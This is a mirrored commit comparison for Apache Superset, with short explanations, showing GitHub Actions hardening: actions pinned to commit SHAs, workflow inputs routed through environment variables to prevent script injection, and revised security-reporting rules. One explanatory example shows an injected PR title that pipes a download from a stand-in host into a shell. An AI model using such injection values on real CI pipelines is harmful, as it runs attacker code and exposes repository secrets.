Mirror of https://github.com/apache/superset.git (synced 2026-05-03 06:54:19 +00:00)
Compare commits: backup/sem...fix/postgr (539 commits)
.github/CODEOWNERS (vendored, 5 changes)

@@ -22,6 +22,11 @@
 /.github/ @villebro @geido @eschutho @rusackas @betodealmeida @nytai @mistercrunch @craig-rueda @kgabryje @dpgaspar @sadpandajoe @hainenber
+
+# Notify PMC members of changes to CI-executed scripts (supply-chain risk:
+# scripts/ files run directly in CI workflows and can execute arbitrary code)
+/scripts/ @villebro @geido @eschutho @rusackas @betodealmeida @nytai @mistercrunch @craig-rueda @kgabryje @dpgaspar @sadpandajoe @hainenber
+
 # Notify PMC members of changes to required GitHub Actions
 /.asf.yaml @villebro @geido @eschutho @rusackas @betodealmeida @nytai @mistercrunch @craig-rueda @kgabryje @dpgaspar @Antonio-RiveroMartnez
.github/SECURITY.md (vendored, 37 changes)

@@ -18,10 +18,32 @@ e-mail address [security@superset.apache.org](mailto:security@superset.apache.org)
 More details can be found on the ASF website at
 [ASF vulnerability reporting process](https://apache.org/security/#reporting-a-vulnerability)

-We kindly ask you to include the following information in your report:
-- Apache Superset version that you are using
-- A sanitized copy of your `superset_config.py` file or any config overrides
-- Detailed steps to reproduce the vulnerability
+**Submission Standards & AI Policy**
+
+To ensure engineering focus remains on verified risks and to manage high reporting volumes, all reports must meet the following criteria:
+- Plain Text Format: In accordance with Apache guidelines, please provide all details in plain text within the email body. Avoid sending PDFs, Word documents, or password-protected archives.
+- Mandatory AI Disclosure: If you utilized Large Language Models (LLMs) or AI tools to identify a flaw or assist in writing a report, you must disclose this in your submission so our triage team can contextualize the findings.
+- Human-Verified PoC: All submissions must include a manual, step-by-step Proof of Concept (PoC) performed on a supported release. Raw AI outputs, hypothetical chat transcripts, or unverified scanner logs will be closed as Invalid.
+
+We kindly ask you to include the following information in your report to assist our developers in triaging and remediating issues efficiently:
+- Version/Commit: The specific version of Apache Superset or the Git commit hash you are using.
+- Configuration: A sanitized copy of your `superset_config.py` file or any config overrides.
+- Environment: Your deployment method (e.g., Docker Compose, Helm, or source) and relevant OS/Browser details.
+- Impacted Component: Identification of the affected area (e.g., Python backend, React frontend, or a specific database connector).
+- Expected vs. Actual Behavior: A clear description of the intended system behavior versus the observed vulnerability.
+- Detailed Reproduction Steps: Clear, manual steps to reproduce the vulnerability.
+
+**Out of Scope Vulnerabilities**
+
+To prioritize engineering efforts on genuine architectural risks, the following scenarios are explicitly out of scope and will not be issued a CVE:
+- Attacks requiring Admin privileges: (e.g., CSS injection, template manipulation, dashboard ownership overrides, or modifying global system settings). Per the CVE vulnerability definition in CNA Operational Rules 4.1, a qualifying vulnerability must allow violation of a security policy. The Admin role is a fully trusted operational boundary defined by Apache Superset's security policy; actions within this boundary do not violate that policy and are therefore considered intended capabilities 'by design,' not vulnerabilities.
+- Brute Force and Rate Limiting: Reports targeting a lack of resource exhaustion protections, generic rate-limiting, or volumetric Denial of Service (DoS) attempts.
+- Theoretical attack vectors: Issues without a demonstrable, reproducible exploit path.
+- Non-Exploitable Findings: Missing security headers, generic banner disclosures, or descriptive error messages that do not lead to a direct, documented exploit.
+
+**Outcome of Reports**
+
+Reports that are deemed out-of-scope for a CVE but represent valid security best practices or hardening opportunities may be converted into public GitHub issues. This allows the community to contribute to the general hardening of the platform even when a specific vulnerability threshold is not met.

 Note that Apache Superset is not responsible for any third-party dependencies that may
 have security issues. Any vulnerabilities found in third-party dependencies should be
@@ -29,6 +51,13 @@ reported to the maintainers of those projects. Results from security scans of Apache
 Superset dependencies found on its official Docker image can be remediated at release time
 by extending the image itself.

+**Vulnerability Aggregation & CVE Attribution**
+
+In accordance with MITRE CNA Operational Rules (4.1.10, 4.1.11, and 4.2.13), Apache Superset issues CVEs based on the underlying architectural root cause rather than the number of affected endpoints or exploit payloads.
+- Aggregation: If multiple exploit vectors stem from the same programmatic failure or shared vulnerable code, they must be aggregated into a single, comprehensive report.
+- Independent Fixes: Separate CVEs will only be assigned if the vulnerabilities reside in decoupled architectural modules and can be fixed independently of one another.
+Reports that fail to aggregate related findings will be merged during triage to ensure an accurate and defensible CVE record.
+
 **Your responsible disclosure and collaboration are invaluable.**

 ## Extra Information
.github/actions/setup-docker/action.yml (vendored, 6 changes)

@@ -26,16 +26,16 @@ runs:
     - name: Set up QEMU
       if: ${{ inputs.build == 'true' }}
-      uses: docker/setup-qemu-action@v3
+      uses: docker/setup-qemu-action@29109295f81e9208d7d86ff1c6c12d2833863392 # v3.6.0

     - name: Set up Docker Buildx
       if: ${{ inputs.build == 'true' }}
-      uses: docker/setup-buildx-action@v3
+      uses: docker/setup-buildx-action@8d2750c68a42422c14e847fe6c8ac0403b4cbd6f # v3.12.0

     - name: Try to login to DockerHub
       if: ${{ inputs.login-to-dockerhub == 'true' }}
       continue-on-error: true
-      uses: docker/login-action@v3
+      uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3.7.0
       with:
         username: ${{ inputs.dockerhub-user }}
         password: ${{ inputs.dockerhub-token }}
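The change above is the pattern repeated throughout this compare: every third-party action reference moves from a mutable version tag to a full commit SHA, with the human-readable version kept as a trailing comment. A minimal sketch of the convention (the action name and SHA below are the real checkout pin used throughout this diff; the commented-out line is the tag form being retired):

```yaml
steps:
  # Mutable tag: whoever controls the v6 tag controls the code that runs in CI.
  # - uses: actions/checkout@v6

  # Immutable pin: a full 40-character commit SHA cannot be re-pointed after the
  # fact; the trailing comment lets humans and Dependabot track the intended version.
  - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
    with:
      persist-credentials: false
```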
.github/dependabot.yml (vendored, 4 changes)

@@ -4,6 +4,10 @@ updates:
   - package-ecosystem: "github-actions"
     directory: "/"
+    ignore:
+      # Ignore temporarily as release schedule is too mentally taxing for dep-handling maintainers
+      # Additionally, very few PRs are reviewed by this action.
+      - dependency-name: anthropics/claude-code-action
     schedule:
       interval: "daily"
.github/labeler.yml (vendored, 5 changes)

@@ -17,6 +17,11 @@
   - any-glob-to-any-file:
     - 'superset/migrations/**'

+"risk:ci-script":
+  - changed-files:
+    - any-glob-to-any-file:
+      - 'scripts/**'
+
 ############################################
 # Dependencies
 ############################################
.github/workflows/bump-python-package.yml (vendored, 20 changes)

@@ -32,7 +32,7 @@ jobs:
     steps:
       - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
-        uses: actions/checkout@v6
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: true
          ref: master
@@ -41,7 +41,7 @@
        uses: ./.github/actions/setup-supersetbot/

      - name: Set up Python ${{ inputs.python-version }}
-       uses: actions/setup-python@v6
+       uses: actions/setup-python@a309ff8b426b58ec0e2a45f0f869d46889d02405 # v6
        with:
          python-version: "3.10"
@@ -51,27 +51,31 @@
      - name: supersetbot bump-python -p "${{ github.event.inputs.package }}"
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+         INPUT_PACKAGE: ${{ github.event.inputs.package }}
+         INPUT_GROUP: ${{ github.event.inputs.group }}
+         INPUT_EXTRA_FLAGS: ${{ github.event.inputs.extra-flags }}
+         INPUT_LIMIT: ${{ github.event.inputs.limit }}
        run: |
          git config --global user.email "action@github.com"
          git config --global user.name "GitHub Action"

          PACKAGE_OPT=""
-         if [ -n "${{ github.event.inputs.package }}" ]; then
-           PACKAGE_OPT="-p ${{ github.event.inputs.package }}"
+         if [ -n "${INPUT_PACKAGE}" ]; then
+           PACKAGE_OPT="-p ${INPUT_PACKAGE}"
          fi

          GROUP_OPT=""
-         if [ -n "${{ github.event.inputs.group }}" ]; then
-           GROUP_OPT="-g ${{ github.event.inputs.group }}"
+         if [ -n "${INPUT_GROUP}" ]; then
+           GROUP_OPT="-g ${INPUT_GROUP}"
          fi

-         EXTRA_FLAGS="${{ github.event.inputs.extra-flags }}"
+         EXTRA_FLAGS="${INPUT_EXTRA_FLAGS}"

          supersetbot bump-python \
            --verbose \
            --use-current-repo \
            --include-subpackages \
-           --limit ${{ github.event.inputs.limit }} \
+           --limit ${INPUT_LIMIT} \
            $PACKAGE_OPT \
            $GROUP_OPT \
            $EXTRA_FLAGS
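Alongside the SHA pins, this hunk shows the second recurring hardening move in the compare: untrusted event fields are no longer interpolated into `run:` blocks with `${{ ... }}` (which pastes attacker-influenced text into the shell script before it is parsed); they are passed through `env:` and read as ordinary shell variables. A minimal before/after sketch of the pattern, using a hypothetical PR-title input for illustration:

```yaml
# Vulnerable: the expression is expanded *before* bash parses the script, so a
# title like `"; curl evil.example | sh; echo "` becomes executable shell code.
- run: echo "Title: ${{ github.event.pull_request.title }}"

# Hardened: the value arrives as process environment data, never as script text.
- run: echo "Title: ${PR_TITLE}"
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}
```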
.github/workflows/cancel_duplicates.yml (vendored, 2 changes)

@@ -31,7 +31,7 @@ jobs:
      - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
        if: steps.check_queued.outputs.count >= 20
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6

      - name: Cancel duplicate workflow runs
        if: steps.check_queued.outputs.count >= 20
.github/workflows/check-python-deps.yml (vendored, 2 changes)

@@ -18,7 +18,7 @@ jobs:
     runs-on: ubuntu-22.04
     steps:
       - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
          submodules: recursive
@@ -25,9 +25,9 @@
       pull-requests: write
     steps:
       - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
      - name: Check and notify
-       uses: actions/github-script@v8
+       uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
        with:
          github-token: ${{ github.token }}
          script: |
.github/workflows/claude.yml (vendored, 6 changes)

@@ -44,7 +44,7 @@ jobs:
       pull-requests: write
     steps:
       - name: Comment access denied
-       uses: actions/github-script@v8
+       uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
        with:
          script: |
            const message = `👋 Hi @${{ github.event.comment.user.login || github.event.review.user.login || github.event.issue.user.login }}!
@@ -71,12 +71,12 @@
       id-token: write
     steps:
       - name: Checkout repository
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          fetch-depth: 1

      - name: Run Claude PR Action
-       uses: anthropics/claude-code-action@beta
+       uses: anthropics/claude-code-action@5fb899572b81d2bb648d4d187173a2f423a9677c # beta
        with:
          anthropic_api_key: ${{ secrets.ANTHROPIC_API_KEY }}
          timeout_minutes: "60"
.github/workflows/codeql-analysis.yml (vendored, 2 changes)

@@ -31,7 +31,7 @@ jobs:
     steps:
       - name: Checkout repository
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6

      - name: Check for file changes
        id: check
.github/workflows/dependency-review.yml (vendored, 6 changes)

@@ -27,9 +27,9 @@ jobs:
     runs-on: ubuntu-24.04
     steps:
       - name: "Checkout Repository"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
      - name: "Dependency Review"
-       uses: actions/dependency-review-action@v4
+       uses: actions/dependency-review-action@2031cfc080254a8a887f58cffee85186f0e49e48 # v4.9.0
        continue-on-error: true
        with:
          fail-on-severity: critical
@@ -49,7 +49,7 @@
     runs-on: ubuntu-22.04
     steps:
       - name: "Checkout Repository"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6

      - name: Setup Python
        uses: ./.github/actions/setup-backend/
.github/workflows/docker.yml (vendored, 21 changes)

@@ -42,7 +42,7 @@ jobs:
     steps:
       - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
@@ -101,23 +101,6 @@
          docker images $IMAGE_TAG
          docker history $IMAGE_TAG

-     # Scan for vulnerabilities in built container image after pushes to mainline branch.
-     - name: Run Trivy container image vulnerabity scan
-       if: github.event_name == 'push' && github.ref == 'refs/heads/master' && (steps.check.outputs.python || steps.check.outputs.frontend || steps.check.outputs.docker) && matrix.build_preset == 'lean'
-       uses: aquasecurity/trivy-action@57a97c7e7821a5776cebc9bb87c984fa69cba8f1 # v0.35.0
-       with:
-         image-ref: ${{ env.IMAGE_TAG }}
-         format: 'sarif'
-         output: 'trivy-results.sarif'
-         vuln-type: 'os'
-         severity: 'CRITICAL,HIGH'
-         ignore-unfixed: true
-     - name: Upload Trivy scan results to GitHub Security tab
-       if: github.event_name == 'push' && github.ref == 'refs/heads/master' && (steps.check.outputs.python || steps.check.outputs.frontend || steps.check.outputs.docker) && matrix.build_preset == 'lean'
-       uses: github/codeql-action/upload-sarif@1b168cd39490f61582a9beae412bb7057a6b2c4e # v4.31.8
-       with:
-         sarif_file: 'trivy-results.sarif'
-
      - name: docker-compose sanity check
        if: (steps.check.outputs.python || steps.check.outputs.frontend || steps.check.outputs.docker) && matrix.build_preset == 'dev'
        shell: bash
@@ -134,7 +117,7 @@
     runs-on: ubuntu-24.04
     steps:
       - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
      - name: Check for file changes
.github/workflows/embedded-sdk-release.yml (vendored, 8 changes)

@@ -16,10 +16,12 @@ jobs:
       id: check
       shell: bash
       run: |
-       if [ -n "${{ (secrets.NPM_TOKEN != '') || '' }}" ]; then
+       if [ -n "${NPM_TOKEN}" ]; then
          echo "has-secrets=1" >> "$GITHUB_OUTPUT"
        fi
+     env:
+       NPM_TOKEN: ${{ (secrets.NPM_TOKEN != '') || '' }}
   build:
     needs: config
     if: needs.config.outputs.has-secrets
@@ -28,8 +30,8 @@
       run:
         working-directory: superset-embedded-sdk
     steps:
-     - uses: actions/checkout@v6
-     - uses: actions/setup-node@v6
+     - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
+     - uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
        with:
          node-version-file: './superset-embedded-sdk/.nvmrc'
          registry-url: 'https://registry.npmjs.org'
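The `config` job being touched here gates later jobs on secret availability, since forked-PR runs execute workflows without repository secrets; the rewrite also moves the secret-presence expression out of the inline `run:` script and into `env:`, consistent with the hardening elsewhere in this diff. A condensed, self-contained sketch of the gating pattern (the `outputs:` wiring is assumed from context, not shown in the hunk):

```yaml
jobs:
  config:
    runs-on: ubuntu-24.04
    outputs:
      has-secrets: ${{ steps.check.outputs.has-secrets }}
    steps:
      - id: check
        shell: bash
        # NPM_TOKEN holds "true" when the secret is set and "" when it is not,
        # so the job output is only emitted on secret-bearing runs.
        run: |
          if [ -n "${NPM_TOKEN}" ]; then
            echo "has-secrets=1" >> "$GITHUB_OUTPUT"
          fi
        env:
          NPM_TOKEN: ${{ (secrets.NPM_TOKEN != '') || '' }}

  build:
    needs: config
    if: needs.config.outputs.has-secrets
    runs-on: ubuntu-24.04
    steps:
      - run: echo "secrets available, safe to publish"
```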
.github/workflows/embedded-sdk-test.yml (vendored, 4 changes)

@@ -18,8 +18,8 @@ jobs:
       run:
         working-directory: superset-embedded-sdk
     steps:
-     - uses: actions/checkout@v6
-     - uses: actions/setup-node@v6
+     - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
+     - uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
        with:
          node-version-file: './superset-embedded-sdk/.nvmrc'
          registry-url: 'https://registry.npmjs.org'
.github/workflows/ephemeral-env-pr-close.yml (vendored, 10 changes)

@@ -20,10 +20,12 @@ jobs:
       id: check
       shell: bash
       run: |
-       if [ -n "${{ (secrets.AWS_ACCESS_KEY_ID != '' && secrets.AWS_SECRET_ACCESS_KEY != '') || '' }}" ]; then
+       if [ -n "${AWS_ACCESS_KEY_ID}" ]; then
          echo "has-secrets=1" >> "$GITHUB_OUTPUT"
        fi
+     env:
+       AWS_ACCESS_KEY_ID: ${{ (secrets.AWS_ACCESS_KEY_ID != '' && secrets.AWS_SECRET_ACCESS_KEY != '') || '' }}
   ephemeral-env-cleanup:
     needs: config
     if: needs.config.outputs.has-secrets
@@ -33,7 +35,7 @@
       pull-requests: write
     steps:
       - name: Configure AWS credentials
-       uses: aws-actions/configure-aws-credentials@v6
+       uses: aws-actions/configure-aws-credentials@8df5847569e6427dd6c4fb1cf565c83acfa8afa7 # v6
        with:
          aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
          aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
@@ -56,7 +58,7 @@
      - name: Login to Amazon ECR
        if: steps.describe-services.outputs.active == 'true'
        id: login-ecr
-       uses: aws-actions/amazon-ecr-login@v2
+       uses: aws-actions/amazon-ecr-login@19d944daaa35f0fa1d3f7f8af1d3f2e5de25c5b7 # v2

      - name: Delete ECR image tag
        if: steps.describe-services.outputs.active == 'true'
@@ -69,7 +71,7 @@
      - name: Comment (success)
        if: steps.describe-services.outputs.active == 'true'
-       uses: actions/github-script@v8
+       uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
        with:
          github-token: ${{github.token}}
          script: |
.github/workflows/ephemeral-env.yml (vendored, 40 changes)

@@ -47,7 +47,7 @@ jobs:
        id: eval-label
        run: |
          if [[ "${{ github.event_name }}" == "workflow_dispatch" ]]; then
-           LABEL_NAME="${{ github.event.inputs.label_name }}"
+           LABEL_NAME="${INPUT_LABEL_NAME}"
          else
            LABEL_NAME="${{ github.event.label.name }}"
          fi
@@ -60,10 +60,12 @@
            echo "result=noop" >> $GITHUB_OUTPUT
          fi
+       env:
+         INPUT_LABEL_NAME: ${{ github.event.inputs.label_name }}
      - name: Get event SHA
        id: get-sha
        if: steps.eval-label.outputs.result == 'up'
-       uses: actions/github-script@v8
+       uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
        with:
          github-token: ${{ secrets.GITHUB_TOKEN }}
          script: |
@@ -94,7 +96,7 @@
            core.setOutput("sha", prSha);

      - name: Looking for feature flags in PR description
-       uses: actions/github-script@v8
+       uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
        id: eval-feature-flags
        if: steps.eval-label.outputs.result == 'up'
        with:
@@ -116,7 +118,7 @@
            return results;

      - name: Reply with confirmation comment
-       uses: actions/github-script@v8
+       uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
        if: steps.eval-label.outputs.result == 'up'
        with:
          github-token: ${{ secrets.GITHUB_TOKEN }}
@@ -160,7 +162,7 @@
     runs-on: ubuntu-24.04
     steps:
       - name: "Checkout ${{ github.ref }} ( ${{ needs.ephemeral-env-label.outputs.sha }} : ${{steps.get-sha.outputs.sha}} )"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          ref: ${{ needs.ephemeral-env-label.outputs.sha }}
          persist-credentials: false
@@ -189,7 +191,7 @@
            --extra-flags "--build-arg INCLUDE_CHROMIUM=false"

      - name: Configure AWS credentials
-       uses: aws-actions/configure-aws-credentials@v6
+       uses: aws-actions/configure-aws-credentials@8df5847569e6427dd6c4fb1cf565c83acfa8afa7 # v6
        with:
          aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
          aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
@@ -197,7 +199,7 @@
      - name: Login to Amazon ECR
        id: login-ecr
-       uses: aws-actions/amazon-ecr-login@v2
+       uses: aws-actions/amazon-ecr-login@19d944daaa35f0fa1d3f7f8af1d3f2e5de25c5b7 # v2

      - name: Load, tag and push image to ECR
        id: push-image
@@ -220,12 +222,12 @@
       pull-requests: write

     steps:
-     - uses: actions/checkout@v6
+     - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false

      - name: Configure AWS credentials
-       uses: aws-actions/configure-aws-credentials@v6
+       uses: aws-actions/configure-aws-credentials@8df5847569e6427dd6c4fb1cf565c83acfa8afa7 # v6
        with:
          aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
          aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
@@ -233,7 +235,7 @@
      - name: Login to Amazon ECR
        id: login-ecr
-       uses: aws-actions/amazon-ecr-login@v2
+       uses: aws-actions/amazon-ecr-login@19d944daaa35f0fa1d3f7f8af1d3f2e5de25c5b7 # v2

      - name: Check target image exists in ECR
        id: check-image
@@ -248,7 +250,7 @@
      - name: Fail on missing container image
        if: steps.check-image.outcome == 'failure'
-       uses: actions/github-script@v8
+       uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
        with:
          github-token: ${{ github.token }}
          script: |
@@ -263,7 +265,7 @@
      - name: Fill in the new image ID in the Amazon ECS task definition
        id: task-def
-       uses: aws-actions/amazon-ecs-render-task-definition@v1
+       uses: aws-actions/amazon-ecs-render-task-definition@77954e213ba1f9f9cb016b86a1d4f6fcdea0d57e # v1
        with:
          task-definition: .github/workflows/ecs-task-definition.json
          container-name: superset-ci
@@ -276,7 +278,9 @@
      - name: Describe ECS service
        id: describe-services
        run: |
-         echo "active=$(aws ecs describe-services --cluster superset-ci --services pr-${{ github.event.inputs.issue_number || github.event.pull_request.number }}-service | jq '.services[] | select(.status == "ACTIVE") | any')" >> $GITHUB_OUTPUT
+         echo "active=$(aws ecs describe-services --cluster superset-ci --services pr-${INPUT_ISSUE_NUMBER}-service | jq '.services[] | select(.status == "ACTIVE") | any')" >> $GITHUB_OUTPUT
+       env:
+         INPUT_ISSUE_NUMBER: ${{ github.event.inputs.issue_number || github.event.pull_request.number }}
      - name: Create ECS service
        id: create-service
        if: steps.describe-services.outputs.active != 'true'
@@ -296,7 +300,7 @@
            --tags key=pr,value=$PR_NUMBER key=github_user,value=${{ github.actor }}
      - name: Deploy Amazon ECS task definition
        id: deploy-task
-       uses: aws-actions/amazon-ecs-deploy-task-definition@v2
+       uses: aws-actions/amazon-ecs-deploy-task-definition@fc8fc60f3a60ffd500fcb13b209c59d221ac8c8c # v2
        with:
          task-definition: ${{ steps.task-def.outputs.task-definition }}
          service: pr-${{ github.event.inputs.issue_number || github.event.pull_request.number }}-service
@@ -307,7 +311,9 @@
      - name: List tasks
        id: list-tasks
        run: |
-         echo "task=$(aws ecs list-tasks --cluster superset-ci --service-name pr-${{ github.event.inputs.issue_number || github.event.pull_request.number }}-service | jq '.taskArns | first')" >> $GITHUB_OUTPUT
+         echo "task=$(aws ecs list-tasks --cluster superset-ci --service-name pr-${INPUT_ISSUE_NUMBER}-service | jq '.taskArns | first')" >> $GITHUB_OUTPUT
+       env:
+         INPUT_ISSUE_NUMBER: ${{ github.event.inputs.issue_number || github.event.pull_request.number }}
      - name: Get network interface
        id: get-eni
        run: |
@@ -318,7 +324,7 @@
          echo "ip=$(aws ec2 describe-network-interfaces --network-interface-ids ${{ steps.get-eni.outputs.eni }} | jq -r '.NetworkInterfaces | first | .Association.PublicIp')" >> $GITHUB_OUTPUT
      - name: Comment (success)
        if: ${{ success() }}
-       uses: actions/github-script@v8
+       uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
        with:
          github-token: ${{github.token}}
          script: |
@@ -331,7 +337,7 @@
          });
      - name: Comment (failure)
        if: ${{ failure() }}
-       uses: actions/github-script@v8
+       uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
        with:
          github-token: ${{github.token}}
          script: |
.github/workflows/generate-FOSSA-report.yml (vendored, 8 changes)

@@ -16,10 +16,12 @@ jobs:
       id: check
       shell: bash
       run: |
-       if [ -n "${{ (secrets.FOSSA_API_KEY != '' ) || '' }}" ]; then
+       if [ -n "${FOSSA_API_KEY}" ]; then
          echo "has-secrets=1" >> "$GITHUB_OUTPUT"
        fi
+     env:
+       FOSSA_API_KEY: ${{ (secrets.FOSSA_API_KEY != '' ) || '' }}
   license_check:
     needs: config
     if: needs.config.outputs.has-secrets
@@ -27,12 +29,12 @@
     runs-on: ubuntu-24.04
     steps:
       - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
          submodules: recursive
      - name: Setup Java
-       uses: actions/setup-java@v5
+       uses: actions/setup-java@be666c2fcd27ec809703dec50e508c2fdc7f6654 # v5
        with:
          distribution: "temurin"
          java-version: "11"
@@ -14,10 +14,10 @@ jobs:
     runs-on: ubuntu-24.04
     steps:
       - name: Checkout Repository
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6

      - name: Set up Node.js
-       uses: actions/setup-node@v6
+       uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
        with:
          node-version: '20'
.github/workflows/issue_creation.yml (vendored, 2 changes)

@@ -17,7 +17,7 @@ jobs:
     steps:
       - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
.github/workflows/latest-release-tag.yml (vendored, 2 changes)

@@ -12,7 +12,7 @@ jobs:
     steps:
       - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
          submodules: recursive
.github/workflows/license-check.yml (vendored, 4 changes)

@@ -15,12 +15,12 @@ jobs:
     runs-on: ubuntu-24.04
     steps:
       - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
          submodules: recursive
      - name: Setup Java
-       uses: actions/setup-java@v5
+       uses: actions/setup-java@be666c2fcd27ec809703dec50e508c2fdc7f6654 # v5
        with:
          distribution: 'temurin'
          java-version: '11'
.github/workflows/no-hold-label.yml (vendored, 2 changes)

@@ -17,7 +17,7 @@ jobs:
     runs-on: ubuntu-24.04
     steps:
       - name: Check for 'hold' label
-       uses: actions/github-script@v8
+       uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
        with:
          github-token: ${{secrets.GITHUB_TOKEN}}
          script: |
.github/workflows/pr-lint.yml (vendored, 2 changes)

@@ -16,7 +16,7 @@ jobs:
       pull-requests: write
     steps:
       - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
          submodules: recursive
.github/workflows/pre-commit.yml (vendored, 6 changes)

@@ -24,7 +24,7 @@ jobs:
         python-version: ["current", "previous", "next"]
     steps:
       - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
-       uses: actions/checkout@v6
+       uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          persist-credentials: false
          submodules: recursive
@@ -42,7 +42,7 @@
          echo "HOMEBREW_REPOSITORY=$HOMEBREW_REPOSITORY" >>"${GITHUB_ENV}"
          brew install norwoodj/tap/helm-docs
      - name: Setup Node.js
-       uses: actions/setup-node@v6
+       uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
        with:
          node-version: '20'
@@ -57,7 +57,7 @@
          yarn install --immutable

      - name: Cache pre-commit environments
-       uses: actions/cache@v5
+       uses: actions/cache@27d5ce7f107fe9357f9df03efb73ab90386fccae # v5
        with:
          path: ~/.cache/pre-commit
          key: pre-commit-v2-${{ runner.os }}-py${{ matrix.python-version }}-${{ hashFiles('.pre-commit-config.yaml') }}
.github/workflows/release.yml (vendored, 12 changes)

@@ -16,17 +16,19 @@ jobs:
       id: check
       shell: bash
       run: |
-       if [ -n "${{ (secrets.NPM_TOKEN != '' && secrets.GH_PERSONAL_ACCESS_TOKEN != '') || '' }}" ]; then
+       if [ -n "${NPM_TOKEN}" ]; then
          echo "has-secrets=1" >> "$GITHUB_OUTPUT"
        fi
+     env:
+       NPM_TOKEN: ${{ (secrets.NPM_TOKEN != '' && secrets.GH_PERSONAL_ACCESS_TOKEN != '') || '' }}
   build:
     needs: config
     if: needs.config.outputs.has-secrets
     name: Bump version and publish package(s)
     runs-on: ubuntu-24.04
     steps:
-     - uses: actions/checkout@v6
+     - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
        with:
          # pulls all commits (needed for lerna / semantic release to correctly version)
          fetch-depth: 0
@@ -42,13 +44,13 @@
      - name: Install Node.js
        if: env.HAS_TAGS
-       uses: actions/setup-node@v6
+       uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
        with:
          node-version-file: './superset-frontend/.nvmrc'

      - name: Cache npm
        if: env.HAS_TAGS
-       uses: actions/cache@v5
